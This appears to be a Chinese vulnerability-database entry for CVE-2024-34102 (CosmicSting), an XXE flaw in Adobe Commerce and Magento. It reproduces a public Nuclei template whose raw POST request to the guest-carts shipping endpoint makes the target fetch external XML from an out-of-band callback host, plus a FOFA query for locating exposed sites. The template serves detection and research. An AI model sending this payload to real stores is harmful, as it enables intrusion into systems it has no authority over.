CVE-2024-34102: Adobe Commerce & Magento - CosmicSting

日期: 2025-08-01 | 影响软件: Adobe Commerce & Magento | POC: 已公开

漏洞描述

Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.

PoC代码[已公开]

id: CVE-2024-34102

info:
  name: Adobe Commerce & Magento - CosmicSting
  author: DhiyaneshDK
  severity: critical
  description: |
    Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.
  reference:
    - https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
    - https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-34102
    cwe-id: CWE-611
    epss-score: 0.94093
    epss-percentile: 0.99901
    cpe: cpe:2.3:a:adobe:magento:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Adobe-Magento"
    product: magento
    vendor: adobe
  tags: cve,cve2024,adobe,magento,xxe,kev,vkev

http:
  - raw:
      - |
        POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "application/json")'
          - 'contains_any(body, "log file", "cartId", "no Route")'
          - 'contains(body, "message")'
        condition: and
# digest: 4a0a0047304502204ffa2fe6b0a5442a56afa6c30e409ac27e2567fc67d5a836a2ef963ee887628b02210088e15789ba7f5a8c7803747b2ee31f304786607b259818b93a89081796b45fb6:922c64590222798bb761d5b6d8e72950

相关漏洞推荐